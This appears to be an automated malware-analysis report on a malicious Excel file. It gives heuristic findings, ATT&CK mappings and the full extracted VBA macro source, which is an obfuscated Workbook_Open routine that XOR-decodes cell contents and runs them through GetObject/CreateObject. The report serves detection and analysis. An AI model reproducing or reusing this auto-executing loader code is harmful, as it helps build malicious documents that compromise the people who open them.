MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is an XLS file containing VBA macros, specifically a Workbook_Open macro that utilizes CreateObject and GetObject calls. The macro attempts to deobfuscate and execute a payload, indicated by the 'Minneapolis' function and the use of hardcoded strings like 'q9b7d8291c'. The deobfuscated content is likely a second-stage downloader.
Heuristics 5
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0 -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4367 bytes |
SHA-256: a17329cfef485d802be51344045c34a6e9cbfc45a9624e99f4e805b2761fdf2f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function Minneapolis(ByVal Pleased As String) As Variant
Dim Transferred As Long: Transferred = 0: Dim Rocks() As Byte
Dim Crimes() As Byte, RestoRation As String, Islam As Integer, Robot As Integer, Chapters As Integer
Crimes = "q9b7d8291c"
GoTo RecoRdings
Constantly:
If Transferred < UBound(Rocks) Then
Islam = Transferred Mod (10)
Chapters = Crimes(Islam * 2)
Robot = Rocks(Transferred)
GoTo Amber
Metropolitan:
RestoRation = RestoRation & Chr(Rocks(Transferred))
Transferred = Transferred + 1
GoTo Constantly
Else
GoTo Grounds
End If
Grounds:
Minneapolis = RestoRation
Exit Function
RecoRdings:
Rocks = Quoted(Pleased)
GoTo Constantly
Amber:
Rocks(Transferred) = Abs(Robot Xor Chapters)
GoTo Metropolitan
End Function
Private Sub Democrats(ByVal Florist As String, ByVal Optimal As String, ByVal HouseHolds As String, ByVal Earrings As String, ByVal Basics As String)
GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0
End Sub
Sub Workbook_Open()
Democrats Minneapolis(Sheets("f2ca").Range("H182").Value), Minneapolis(Sheets("f2ca").Range("F133").Value), Minneapolis(Sheets("f2ca").Range("J189").Value), Minneapolis(Sheets("f2ca").Range("J112").Value), Minneapolis(Sheets("f2ca").Range("J116").Value)
End Sub
Private Function Quoted(ByVal Nurses As String) As Variant
Dim RestoRation() As Byte, i As Long, Islam As Integer, Jurisdiction As Integer
Jurisdiction = Len(Nurses) / 2: i = 0: ReDim RestoRation(0 To Jurisdiction) As Byte
Chapters:
If i < Len(Nurses) Then
Islam = Islam + 1
RestoRation(Islam - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(Nurses, i + 1, 2)
i = i + 2
GoTo Chapters
Else
GoTo MatheMatical
Dim Amber As String
Amber = InputBox("celp lape")
End If
MatheMatical:
Quoted = RestoRation
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.